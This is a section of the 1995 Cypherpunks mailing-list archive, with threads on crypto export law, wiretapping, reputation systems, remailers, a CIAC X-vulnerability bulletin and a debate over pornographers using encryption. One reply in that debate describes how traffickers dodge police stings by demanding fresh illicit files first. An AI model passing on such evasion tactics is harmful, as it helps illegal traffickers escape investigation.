to stop the DOMESTIC spread of strong crypto that doesn't involve the
incarceration of your top executives ...

--
Jeff Simmons
jsimmons at goblin.punk.net

From jcobb at ahcbsd1.ovnet.com Wed Nov 22 01:39:47 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Wed, 22 Nov 1995 17:39:47 +0800
Subject: Junk E-Mail
Message-ID:

Friend,

People are complaining about junk mail. No problem...

11 21 95 The Electronic Telegraph reports:

   THE European Parliament will decide today whether to ban junk mail.
   Euro MPs are also considering whether to outlaw credit card
   transactions by phone and whether direct selling via E-mail should
   be curbed.

   Today's vote has been triggered by proposals from the European
   Commission to protect consumers buying goods without seeing them.

Your complaints are highly valued at Minute Mortuary at 2d & Main, which
advertises "Privacy Knows No Limits."

Cordially,

Jim

NOTE. The Electronic Telegraph website's URL: http://www.telegraph.co.uk
The newsstory's headline: Junk mail faces last post
Its online filename: wjunk21.html

From jcobb at ahcbsd1.ovnet.com Wed Nov 22 01:47:13 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Wed, 22 Nov 1995 17:47:13 +0800
Subject: rand-test
Message-ID:

Friend,

The following information from

   CIAC Bulletin G-04: X Authentication Vulnerability
   November 20, 1995 22:00 GMT

may be of use to you:

   If you cannot use DES, you can determine your exposure to remote
   attackers by testing the strength of your rand() function using the
   program rand-test; the source is available as
   ftp://ftp.x.org/pub/DOCS/rand-test/rand-test.c

Cordially,

Jim

NOTE. To subscribe to CIAC Bulletin, email to ciac-listproc at llnl.gov
the one-line message

   subscribe ciac-bulletin

, for example:

   subscribe ciac-bulletin Adolphus, Gustavus 000-000-0000 x00

From jcobb at ahcbsd1.ovnet.com Wed Nov 22 01:52:42 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Wed, 22 Nov 1995 17:52:42 +0800
Subject: Junk E-Mail - Part 2
Message-ID:

Friend,

People are complaining about junk mail now. Wait until they find out what
real JUNK mail is...

11 21 95 Associated Press reports:

   To make electronic mail as universally available in the United States
   as telephones, the federal government and business would need to work
   together, the [RAND] report said.

RAND is known for generating options, but...

   ...the study recommended using public funding....

The government --I mean, RAND-- isn't too happy about people owning their
own computers:

   As a way to reach people who don't own computers, the study
   recommended that terminals be located in public places -- street
   corners, community centers, libraries, hotels -- just as pay phones
   are, so people can send and receive electronic messages.

What if people find out that this "private study," as AP calls it, is
really JUNK mail from Joint Underhanded 'Net Kill-off?

Cordially,

Jim

NOTE.
The NandO News website's URL: http://www.nando.net
The newsstory's head- and datelines:
   Study: Every American should have mailbox in cyberspace
   WASHINGTON (Nov 21, 1995 - 11:01 EST)
Its online filename: nation611_4.html

From moroni at scranton.com Wed Nov 22 02:09:39 1995
From: moroni at scranton.com (Moroni)
Date: Wed, 22 Nov 1995 18:09:39 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To:
Message-ID:

There is and probably never will be a shortage of people to carry on wire
tapping. The term agent could be all encompassing in the future to
include but not be limited to the hiring of ex-federally employed
personnel with the talents or capacity for the talent to do wiretapping.
In other words there are any number of ex-CIA, DEA, ex-military who if
were hired would actually save the government investigation time and
costs because they have already gone through security clearance. Add to
that the fact that most if not all FBI personnel have gone through a
light wiretap course to familiarize them with the rudiments of the craft.
All these figures add up to cover the taps in case a disaster of the
terroristic kind should happen.

I feel that numbers are there to worry people but that what the FBI is
worrying about is whether it can cover large ground if there is a siege
like state in this country. HOWEVER, there will always be those that
opportunistically take advantage of circumstances to set up their own
invisible little fiefdoms along the political and social terrain.

If you ask me if there is something for them to worry about I have to in
all good conscience say yes, if you ask if there is something for us to
worry about again I have to say yes. I don't know if there is even a
common ground for both sides to work towards because terrorism has grown
to include the homegrown variety.
Deirdre

From anonymous-remailer at shell.portal.com Wed Nov 22 02:45:56 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 22 Nov 1995 18:45:56 +0800
Subject: Mandarins, Lifers, and Talents
Message-ID: <199511221028.CAA25326@jobe.shell.portal.com>

On Tue, 21 Nov 1995, Lou Poppler wrote:
> Mandarins were involved in the genesis, certainly, both of our little
> college network, and of the military's arpanet. The mandarins provided
> our subsidies, and some of them found ways to use the net in doing their
> academic work. Very many of them ignored us.

Or tried their utmost best to ... until we came a knocking.

> Among us paid computer staff,
> the mandarins held occasional blue-sky meetings to plot the future and
> standards for the future; the lifers went about their business of feeding
> hollerith cards to the mainframes; and the talents immediately set about
> exploring this orthogonal new quirk of their machine. All the edges were
> rough in the beginning, and for a long time after the beginning.

Gee, I thought, err ... uhhm, shoot, aren't we still at the beginning??
Not the very beginning, but the beginning. Wasn't all of the NII stuff
simply a true mandarin plot^H^H^H^H scheme^H^H^H^H^H^H contingency to get
enough money to continue "The Project" during some very lean budgetary
years? Or am I behind in my reading again ...

> Network
> code arrived in huge inspired chunks from our eccentric talents. Other
> talents, staff and user alike, would go out to play on the network and
> find little suggestions for the eccentric talents responsible.

All talents are by definition _irresponsible_. They have to be in order
to take the risks, sometimes some very silly risks in hindsight.

> I think the early networks were less than satisfying for the mandarins.

A satisfied mandarin?? Hmmm. That'll take a couple of cycles to compute.
;-)

> It required arcane mandarin accounting schemes to rationalize our
> perpetual deficits, even in a 'funny money' accounting world.

Well, they've saved my butt (I think) when someone hung up the phone on
me. And for this, they've certainly got *some* of my allegiance. ;-) And
they have my gratitude.

> Policies and standards were strained by the sudden accessibility of
> the foreign operations, under alien chains of command. The networks
> were immediately untidy and required compromise from the user.
>
> The biggest contribution from the mandarins, and I mean this with
> all gratitude, is that they chose, again and again, not to shut us down.

Chin. chin.

> ObCrypto: we were still getting the bugs out of rot13 back then.

Ahh, before they broke the code on what a baker's dozen REALLY was all
about. Way back in the days when one-half was still working on rot12.

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.
C. S. U. M. O. C. L. U. N. E.

From cman at communities.com Wed Nov 22 19:08:07 1995
From: cman at communities.com (Douglas Barnes)
Date: Wed, 22 Nov 95 19:08:07 PST
Subject: ecash protocol: Part 1
Message-ID:

> From what I gathered from Doug's posts a little while back, the _client_
>stuff is perfectly fine; only the _bank_ stuff is Chaum-patented.
>

This is exactly backwards. Also, it is entirely possible that they have
structured the protocol to make sure that both sides have to practice
some element of Digicash intellectual property.

What I said was "it is possible to create an anonymous digital cash
system where the bank does not infringe and the client can optionally
infringe or not infringe (sacrificing anonymity)."
(See: http://www.communities.com/paper/agnostic.html) From anonymous-remailer at shell.portal.com Wed Nov 22 03:09:39 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 22 Nov 1995 19:09:39 +0800 Subject: Java & Netscape security [NOISE] Message-ID: <199511221048.CAA26409@jobe.shell.portal.com> On Tue, 21 Nov 1995, Dr. Dimitri Vulis wrote: > Hmm... If it looks remotely like marketing, it'd better carry the usual > disclaimers that past returns are no indication of future returns etc. :) > > >In the first case, the poster is not commenting about anything to do with > >their work, -- it really is just one man's opinion -- while in the second > >they are actually commenting upon something their employer is selling. What I'm trying to say is that if someome posts from watson.ibm.com, and IF they are talking about OS/2, we will not accept that they are not speaking independantly of the knowledge they have garnered from watson. It just doesn't work that way. In the same way, someone who writes from Netscape.com or AT&T, or Sun and tries to disclaim that they are speaking for the company, when they step out as an employee of a company is deluding themselves. When in the press have you seen a reporter claim as a source, an "unnamed Senator"? Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. P.P.S. I just sent email to Steve Bellovin from AT&T. I thought I'd settle the question once and for all, as to whether he IS reading this mailing list or not. From khijol!erc Wed Nov 22 19:49:05 1995 From: khijol!erc (Ed Carp [khijol SysAdmin]) Date: Wed, 22 Nov 95 19:49:05 PST Subject: Visual Basic 4.0 encryption prog. In-Reply-To: Message-ID: <199511230443.WAA07909@khijol> -----BEGIN PGP SIGNED MESSAGE----- > But there is no reason why this isn't possible in ANY language. You'll > just have to write a lot of code by hand, or port to VB... 
> especially the
> large-number routines.

I don't see any reason why crypto routines written in C can't be converted to .DLL files - then you can call them from VB or whatever. No need to convert them to VB.

- --
Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com
214/993-3935 voicemail/pager
Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi

Q. What's the trouble with writing an MS-DOS program to emulate Clinton?
A. Figuring out what to do with the other 639K of memory.

From weidai at eskimo.com Wed Nov 22 04:41:12 1995
From: weidai at eskimo.com (Wei Dai)
Date: Wed, 22 Nov 1995 20:41:12 +0800
Subject: towards a theory of reputation
In-Reply-To: <199511212332.PAA24563@jobe.shell.portal.com>
Message-ID:

On Tue, 21 Nov 1995, Hal wrote:

> This is an interesting approach. However this seems to fold in issues of
> reliability with issues of quality and value. If I have a choice of two
> vendors, one of whom produces a product which is twice as good, but there
> is a 50% chance that he will abscond with my money, I am not sure how to
> value him compared with the other. It seems like the thrust of the
> analysis later is to determine whether people will in fact try to
> disappear. But that is not well captured IMO by an analysis which just
> ranks people in terms of "utility" for the price.

Our intuitive notion of reputation combines the issues of reliability and quality. In your example, whether you choose the reliable vendor or the unreliable one depends on whether you are risk-seeking or risk-averse. You must prefer one or the other or be indifferent.
In general how you make these choices depends on your values and your expectations of what the vendors will do, which include both expectations of reliability and expectations of quality. Can you elaborate more on why the analysis is inadequate? (I know it probably isn't adequate, but why do you think so?)

> I am not sure about this last point. It seems to me that a good
> reputation is one which is most cost-effective for its owner. Whether it
> is good for social stability is not relevant to the person who is
> deciding whether to use it. ("But what if everyone behaved that way?
> How would you feel then?") It may be nice for the analyst but not for
> the participant.

Right, I'm speaking from the point of view of the analyst when I say "good", but it also applies to individual participants. Each person does what he thinks is in his best interest, but if this turns out to be unstable for the reputation system as a whole, then it won't last very long so there is little point in getting involved in the first place. In other words, I would not choose to participate in an unstable reputation system.

> I don't really know what the first one means. There are a lot of
> different ways I can behave, which will have impact on my reputation, but
> also on my productivity, income, etc. There are other ways I can damage
> my reputation than by cheating, too. I can be sloppy or careless or just
> not work very hard. So the first two are really part of a continuum of
> various strategies I may apply in life. The second is pretty clear but
> the first seems to cover too wide a range to give it a value.

You are right that there is a continuum of strategies, but I assume there is a discontinuity between completely throwing away your reputation and any other strategy. So operating value is the maximum amount of profit you can make by optimizing among all other strategies except disappearing.

> It would be useful to make some of the assumptions a bit clearer here.
> Is this a system in which cheating is unpunishable other than by loss of
> reputation, our classic anonymous marketplace? Even if so, there may be
> other considerations. For example, cheating may have costs, such as
> timing the various frauds so that people don't find out and extricate
> themselves from vulnerable situations before they can get stung. Also,
> as has been suggested here in the past, people may structure their
> interactions so that vulnerabilities to cheating are minimized, reducing
> the possible profits from that strategy.

When I wrote the original post I was thinking of the classic anonymous marketplace. But I think it can apply to other types of markets. Cheating costs can be easily factored into the throw-away value, and an important question for any theory of reputation to answer is how to structure transactions to minimize this value. Many more assumptions need to be made in modeling a particular reputation system, but I was trying to list some general properties that might apply to all reputation systems.

> It might be interesting to do something similar to Axelrod's Evolution
> of Cooperation, where (human-written) programs played the Prisoner's
> Dilemma against each other. In that game, programs had reputations in
> a sense, in that each program when it interacted with another
> remembered all their previous interactions, and chose its behavior
> accordingly. The PD is such a cut-throat game that it apparently
> didn't prove useful to try to create an elaborate reputation-updating
> model (at least in the first tournaments; I understand that in later
> versions some programs with slightly non-trivial complexity did well).

The tit-for-tat program that won both contests uses an extremely simple reputation algorithm -- it expects the next action of the other player to be the same as the last action. This is an example of what I called a "good" reputation algorithm.
It serves the self-interest of the entities that use it; it is cheap to use; when widely used the system is stable.

Wei Dai

From perry at alpha.jpunix.com Wed Nov 22 04:51:03 1995
From: perry at alpha.jpunix.com (John Perry)
Date: Wed, 22 Nov 1995 20:51:03 +0800
Subject: Syrinx Remailer is no more
In-Reply-To:
Message-ID: <199511221230.GAA16020@alpha.jpunix.com>

-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Lance" == Lance Cottrell writes:

Lance> -----BEGIN PGP SIGNED MESSAGE----- This is the kind of
Lance> announcement which really needs to be authenticated. I
Lance> will leave syrinx on my list until I see a signed message
Lance> confirming this announcement. If we do not bother to
Lance> authenticate this kind of message, why bother with all the
Lance> crypto, here is the mother of all denial of service
Lance> attacks.

Lance> -Lance

Lance> At 7:22 PM 11/21/95, Sam Kaplin wrote:
>> Effective immediately syrinx at c2.org is no more. I no longer
>> have the time to keep this remailer up and running. Perhaps
>> somewhere down the line I will set up another one. Please
>> remove Syrinx from your chains.

I agree with Lance. It stays in the list I distribute until I see some authentication from Sam Kaplin.

John Perry - KG5RG - perry at alpha.jpunix.com - PGP-encrypted e-mail welcome!
Packet Radio - KG5RG at WA4IMZ.#SETX.TX.USA.NA
WWW - http://www.jpunix.com
PGP 2.62 key for perry at jpunix.com is on the keyservers.
From kelli at zeus.towson.edu Wed Nov 22 20:52:53 1995
From: kelli at zeus.towson.edu (banjo, lord of the sea monkeys)
Date: Wed, 22 Nov 95 20:52:53 PST
Subject: Nicholas Negroponte interview in MEME
Message-ID:

The latest issue of MEME has a pretty good interview with Nicholas Negroponte of the MIT Media Lab. Some privacy issues are discussed, the idea of intellectual property is touched on, as well as some other good stuff. I'm not sure if it's on the web, but I'll forward the interview to anyone who would like to have it.

K. Ellis

OBCrypto: How's it going, Perry?

Kathleen M. Ellis http://zeus.towson.edu/~kelli/
kelli at zeus.towson.edu Diverse Sexual Orientation Collec.
Towson State University DSOC at zeus.towson.edu
"Your friends are really just enemies who don't have the guts to kill you" -J. Tenuta

From cme at clark.net Wed Nov 22 22:34:06 1995
From: cme at clark.net (Carl Ellison)
Date: Wed, 22 Nov 95 22:34:06 PST
Subject: crypto for porno users
Message-ID: <199511230633.BAA05538@clark.net>

I hear occasional uproar from LE types about porno traffickers using strong crypto like PGP.

[I've been known occasionally to say things for their shock value, but this time I'm quite serious.]

------------------------------

As a society wanting to limit the spread of porn, we should encourage those trafficking in porn to use strong crypto.

1. If two people are sending porn from one to another over the net, the net is so insecure that many people along the way could see it. The recipient field could be mistyped, as well. Either way, someone who doesn't want the porn could receive it and be offended.
    Strong crypto wrapping that porn protects the innocent accidental recipient from exposure to the porn.

2. If cops want to track down some pornographer (e.g., because he's dealing in child porn), the net and strong crypto provide two opportunities to the police:

    a) "no one on the net knows you're a dog" implies that police can pose as a fellow porn producer or consumer and get away with it more easily.

    b) strong crypto for communications between porn users encourages them to speak more freely. When one of the two is a police officer in disguise, that encourages the other (the suspect) to reveal more, making the investigation proceed more quickly. Knowing that the crypto is strong enough to keep government eavesdroppers out, the sender is given a false sense of security -- is distracted from thinking about the trustworthiness of the receiver while thinking about the security of the channel itself.

3. Encryption of porn would work against the kind of porn distribution found on the alt.binary.pictures.erotic... newsgroups. Encryption requires that recipients be identified.

4. Personal file encryption encourages individuals dealing with porn to encrypt and keep personal diaries which might contain evidence. Since PGP is subject to brute force passphrase attacks, this gives an attack which will open *some* of these diaries. Without the encryption, the suspect is less likely to keep the diary in the first place. This isn't a guaranteed opening into all such diaries. There is no such guarantee possible. Rather, this suggests that strong crypto has a chance to maximize the effective "take" by LE forces.

These advantages are balanced against the possibility that there is some group of pornographers who communicate together, who are identified by the police, who would be wiretapped *and* who are not infiltrated -- and therefore whose conversations are unavailable to the police.
The larger such a group, the less likely it will remain non-infiltrated, so these groups are probably very small. There might be some of these -- just as there might be a few pornographers who have diaries that are encrypted and unbreakable.

However, strong crypto opens a number of opportunities for successful investigation -- and it's my guess that in the balance, strong crypto adds up as a net advantage to the police rather than a net drawback.

- Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 |
| ``Officer, officer, arrest that man! He's whistling a dirty song.'' |
+---------------------------------------------- Jean Ellison (aka Mother) -+

From adam at lighthouse.homeport.org Wed Nov 22 07:18:58 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Wed, 22 Nov 1995 23:18:58 +0800
Subject: Java & Netscape security [NOISE]
In-Reply-To:
Message-ID: <199511221435.JAA06382@homeport.org>

Dr. Dimitri Vulis wrote:

| Moreover, I think that if someone known to work for Sun
| posts from Netcom about Sun products, policies, and future plans,
| s/he'll have both higher credibility and higher responsibility to
| the readers than a proverbial person from the street.

Could I suggest that people who are in this situation create a nym-key, work through remailers, and we drop the thread? :)

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From liberty at gate.net Wed Nov 22 07:24:41 1995
From: liberty at gate.net (Jim Ray)
Date: Wed, 22 Nov 1995 23:24:41 +0800
Subject: Encryption Politics (was Re: "Dear Newt" Letter...)
Message-ID: <199511221444.JAA137201@tequesta.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

Phill wrote:

>If you make it a party issue you will not only lose but risk turning the
>clock the other way.
>At the moment everyone knows that the export control
>laws are not stopping people from getting PGP. It is not a good idea to
>rub people's noses in it.

Why not? It gets the issue talked about when it otherwise wouldn't be. The cypherpunks are the Dr. Kevorkians of stupid US export laws.

>It is easy to ignore export violations by turning a blind eye. It is
>difficult to turn a blind eye when people are so anxious to announce what
>is going on.

Exactly. I plan to go to the Nandotimes article at URL http://www2.nando.net/newsroom/ntn/info/info429_4.html and see what it looks like with a few substitutions like "cars," "highways," and "doorlocks" for words like "encode" or "encrypt." Sarcasm is often the last refuge libertarians have in these humor-impaired times, but it keeps me sane. :)

>Phil Z. is not having problems because he wrote PGP, he
>is having problems because he made sure the FBI couldn't pretend they
>did not know what was going on.

Well, not exactly. I believe from what I've seen here before that it was Kelly Goen(sp?) who did this. Of course, I've advocated everyone taking legal responsibility for Kelly's actions as a kind of protest against creeping Naziism in "our" government (see my "An Old Idea" post, buried somewhere in the c-punk archives).

>If you make encryption a party issue then one of those Grassley bills
>will pass and the President in power may not veto it.

Encryption _IS_ a party issue, and quite possibly an effective one if we used it correctly, for the *Libertarian* Party! The actions of both "major" parties would have been [IMO] bad PR if the media decided to do their jobs (I know, big "if"). There is, of course, institutional L. party resistance to putting the individual right to strong encryption on the "front burner" because our "generals," despite a consistent record of losing battles, insist on fighting the last war (that is, when we aren't busy fighting each other).
JMR

[Who takes this opportunity to remind SO FL cypherpunks of the party at 7:30PM on Wed. Nov. 29th.]

Regards, Jim Ray -- http://www.shopmiami.com/prs/jimray

"This year will go down in history, for the first time a civilized nation has full gun registration! Our streets will be safer, our police more efficient, and the world will follow our lead in the future." -- Adolf Hitler, 1935
-----------------------------------------------------------------------
PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
Key id. # E9BD6D35 (key on page & servers) IANAL
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________

From ac at hawk.twinds.com Wed Nov 22 07:32:48 1995
From: ac at hawk.twinds.com (Arley Carter)
Date: Wed, 22 Nov 1995 23:32:48 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To:
Message-ID:

This discussion is beginning to resemble one about the telephone system about 50 years ago. A national phone system was considered an impossibility by many. This is because even if AT&T employed every female >18 years old as telephone operators there weren't enough to plug and unplug all the connections on all the switchboards.

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac at hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from ."

On Tue, 21 Nov 1995, Moroni wrote:

> There is and probably never will be a shortage of people to carry on
> wire tapping .
> The term agent could be all encompassing in the future to
> include but not be limited to the hiring of ex-federally employed
> personnel with the talents or capacity for the talent to do wiretapping.
> In other words there are any number of ex-CIA, DEA, ex-military who if
> were hired would actually save the government investigation time and
> costs because they have already gone through security clearance. Add to
> that the fact that most if not all FBI personnel have gone through a
> light wiretap course to familiarize them with the rudiments of the craft.
> All these figures add up to cover the taps in case a disaster of the
> terroristic kind should happen. I feel that numbers are there to worry
> people but that what the FBI is worrying about is whether it can cover
> large ground if there is a siege like state in this country. HOWEVER,
> there will always be those that opportunistically take advantage of
> circumstances to set up their own invisible little fiefdoms along the
> political and social terrain.
> If you ask me if there is something for them to worry about I have to
> in all good conscience say yes, if you ask if there is something for us
> to worry about again I have to say yes. I don't know if there is even a
> common ground for both sides to work towards because terrorism has grown
> to include the homegrown variety.
>
> Deirdre
>

From froomkin at law.miami.edu Wed Nov 22 08:00:23 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Thu, 23 Nov 1995 00:00:23 +0800
Subject: Spam the Sign!
In-Reply-To: <199511220307.VAA01713@snoopy.vetmed.auburn.edu>
Message-ID:

[regarding suggestion that netscape give mit or someone a 128 bit version to place on an ftp server]

This is not an apology for the ITAR, just my usual lawyerly overcaution:

Suppose A gives B a program that is export controlled, intending for B to allow it to be exported. Has A conspired with B to export the program?

Let's ask the grand jury investigating Phil....

A.
Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law | froomkin at law.miami.edu
P.O. Box 248087 | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.

From froomkin at law.miami.edu Wed Nov 22 08:04:07 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Thu, 23 Nov 1995 00:04:07 +0800
Subject: towards a theory of reputation
In-Reply-To:
Message-ID:

This discussion puzzles me. I thought we were bombarded with reputational goods all the time: brand names, stocks (what is a purchase in the 2ndary market but a purchase of reputation most of the time?), degrees from famous universities.

Anonymity complicates matters only if no system of unique ID is used. Throw in digital signatures and we are back at brand names, aren't we?

A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law | froomkin at law.miami.edu
P.O. Box 248087 | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.

From edge at got.net Thu Nov 23 00:12:11 1995
From: edge at got.net (Jay Campbell)
Date: Thu, 23 Nov 95 00:12:11 PST
Subject: crypto for porno users
Message-ID: <199511230817.AAA22826@you.got.net>

> a) "no one on the net knows you're a dog" implies that police can
> pose as a fellow porn producer or consumer and get away with it
> more easily.
>
> b) strong crypto for communications between porn users encourages
> them to speak more freely. When one of the two is a police officer
> in disguise, that encourages the other (the suspect) to reveal more,
> making the investigation proceed more quickly. Knowing that the
> crypto is strong enough to keep government eavesdroppers out, the
> sender is given a false sense of security -- is distracted from
> thinking about the trustworthiness of the receiver while thinking
> about the security of the channel itself.
A common way to get around prostitution sting operations is to ask the lady to expose sensitive portions of her anatomy to prove her sincerity before the would-be customer commits to any transactions; this sort of thing is also becoming commonplace on the net for pornography or pirated software, too. Would-be traffickers often ask a prospective recipient for a small chunk of fresh files in advance, before passing back anything serious .. partially out of suspicion, mostly out of greed, but to the same end. A law enforcement team would be stepping onto shaky ground if they were forced to transfer illegal images/etc to a suspected trafficker before getting evidence from him. Entrapment is an ugly concept.

>3. Encryption of porn would work against the kind of porn distribution
> found on the alt.binary.pictures.erotic... newsgroups. Encryption
> requires that recipients be identified.

Not at all .. a porn distributor could generate a key pair, use part A to encode the images, and disseminate part B thru a variety of outlets - publicly posted, sold, passed thru an informal network of like-minded netizens...

>4. Personal file encryption encourages individuals dealing with porn to
> encrypt and keep personal diaries which might contain evidence.
> Since PGP is subject to brute force passphrase attacks, this gives
> an attack which will open *some* of these diaries. Without the
> encryption, the suspect is less likely to keep the diary in the
> first place. This isn't a guaranteed opening into all such
> diaries. There is no such guarantee possible. Rather, this
> suggests that strong crypto has a chance to maximize the effective
> "take" by LE forces.

I would argue the exact opposite - strong crypto would tend to minimize the effective take, since there's no guarantee that /anything/ on a perp's system will be in the clear. I'll let someone else with a better background pound on the 'brute force' section.
--
Jay Campbell edge at got.net - Operations Manager
-=-=-=-=-=-=- Sense Networking, Santa Cruz Node
Jay at Campbell.net got.net? PGP MIT KeyID 0xACAE1A89
"On the Information Superhighway, I'm the guy behind you in this morning's traffic jam leaning on his horn."

From netsurf at pixi.com Wed Nov 22 09:05:38 1995
From: netsurf at pixi.com (NetSurfer)
Date: Thu, 23 Nov 1995 01:05:38 +0800
Subject: Pedophiles use encoding devices to make secret use of Internet
In-Reply-To:
Message-ID:

When I tried this URL I got:

404 Not Found

The requested URL /newsroom/ntn/info/info429_4.html was not found on this server.

On Tue, 21 Nov 1995, Weld Pond wrote:

>
> Story in Nando Times
>
> http://www2.nando.net/newsroom/ntn/info/info429_4.html
>
>
> Weld Pond - weld at l0pht.com - http://www.l0pht.com/
> L 0 p h t H e a v y I n d u s t r i e s
> Technical archives for the people - Bio/Electro/Crypto/Radio
>
>

-NetSurfer

#include
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
== = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 >
" " o " |P. O. Box 15432 |finger netsurf at akamai.pixi.com for >
" " / \ " |Honolulu, HI 96830 |full PGP key; also browse me at >
\" "/ G \" |Serendipitous Solutions|http://www.pixi.com/~netsurf >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

From jamesd at echeque.com Wed Nov 22 09:05:58 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 23 Nov 1995 01:05:58 +0800
Subject: towards a theory of reputation
Message-ID: <199511221621.IAA19163@blob.best.net>

>On Mon, 20 Nov 1995, James A. Donald wrote:
>
>> Any attempt to discuss and analyze reputations using
>> morally neutral language is bound to wind up as boring long
>> winded meaningless complicated word salad.

At 12:19 AM 11/22/95 -0800, Wei Dai wrote:
>I don't understand what you mean by this.
>Can you give an example to how
>to discuss reputation (i.e., the concept of reputation, not a particular
>reputation) using morally non-neutral language?

Under current circumstances, where we have a large oversupply of free government supplied retributive violence, the most important form of reputation is "credit rating", which indicates willingness to pay one's legitimate debts and perform contracts.

Willingness to fulfill one's obligations is not at all the same thing as willingness to act in a way that improves other people's utility. Fulfilling an obligation assumes normative criteria. Any attempt to describe credit worthiness in terms of its effect on the utility of creditors misses the point.

Before the nineteenth century, when most governments were reluctant to provide adequate retributive violence, and were more concerned with collecting taxes than upholding law and order, the most important form of reputation was the reputation for being a "gentleman" which encompassed both willingness to pay one's just debts and "gentle" conduct, gentle conduct meaning that you were unlikely to kill or harm people without good reason, but did not require that you went around performing good works.

Now if someone has a reputation for good workmanship, this might seem non normative, but such a reputation is a mixture of two components: "X has good quality products" which is not normative and is a fact rather than a reputation, because it does not involve a prediction of future behavior, and "X will fulfill the spirit and intention of a contract" which is a reputation, and is normative.

For example although in principle X might simultaneously have a reputation for good workmanship and a reputation for not paying his debts and not delivering on contracts, such a combination would seem unusual and surprising.
---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From dreschs at mpd.tandem.com Wed Nov 22 10:07:10 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Thu, 23 Nov 1995 02:07:10 +0800
Subject: Pedophiles use encoding devices to make secret use of Internet
In-Reply-To:
Message-ID: <199511221739.LAA28319@galil.austnsc.tandem.com>

N> When I tried this URL I got:
N> 404 Not Found
N> The requested URL /newsroom/ntn/info/info429_4.html was not found on
N> this server.

Nando seems to be having problems - I got the same error several times following links on it.

--
#include /* Sten Drescher */
To get my PGP public key, send me email with your public key and
Subject: PGP key exchange
Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3

From anonymous-remailer at shell.portal.com Wed Nov 22 10:16:53 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 23 Nov 1995 02:16:53 +0800
Subject: key for Alice as promised
Message-ID: <199511221754.JAA19505@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 21 Nov 1995, I wrote:

> On Tue, 21 Nov 1995, Russell Nelson wrote:
>
> > anonymous-remailer at shell.portal.com writes:
> > > Alice here ...
> >
> > How do we know this for a fact?
>
> We don't.
>
> As an incentive for Alice to generate herself a PGP key, I hereby
> place Alice on notice that if she doesn't sign her next post, and
> provide a PGP key, I will create one for her, and steal all the
> positive (?) reputation that she has developed so far.
>
> You have 24 hours Alice, otherwise a key gets posted to here, and to
> the keyservers with your nym on it.
Well 24 hours have passed, and Alice remains unrepentant:

On Tue, 21 Nov 1995, the old Alice de 'nonymous wrote:

> Alice here ...
>
> No, *I* am the real Alice, and I refuse to use PGP signing.

So here we go Alice's key:

Type bits/keyID Date User ID
pub 1024/23292ED1 1995/11/22 Alice de 'nonymous
Key fingerprint = CA 76 81 41 54 CE E7 D6 62 EE 6D 65 EE FB A3 55

Anything posted without being signed by the above key isn't from me.

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.
C. S. U. M. O. C. L. U. N. E.

From A.Back at exeter.ac.uk Wed Nov 22 10:19:53 1995
From: A.Back at exeter.ac.uk (A.Back at exeter.ac.uk)
Date: Thu, 23 Nov 1995 02:19:53 +0800
Subject: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
In-Reply-To: <199511221609.LAA21172@jekyll.piermont.com>
Message-ID: <5579.199511221742@olib>

Perry Metzger writes:
> "James M. Cobb" writes:
> > Friend,
> >
> >
> > The following information from
>
> 1) You are not my friend.
>
> 2) My private mail to you hasn't convinced you to stop this barrage of
> reposts. Would you please do so?
I am inclined to agree with Perry in as much as the volume of posts to the cypherpunks list is greatly increased by reposts of news from other mailing lists, USENET newsgroups, WWW sources, newspapers, TV programs, films, books, talks, etc.

While some of the information posted is interesting, and relevant, some others are less relevant, bordering on noise.

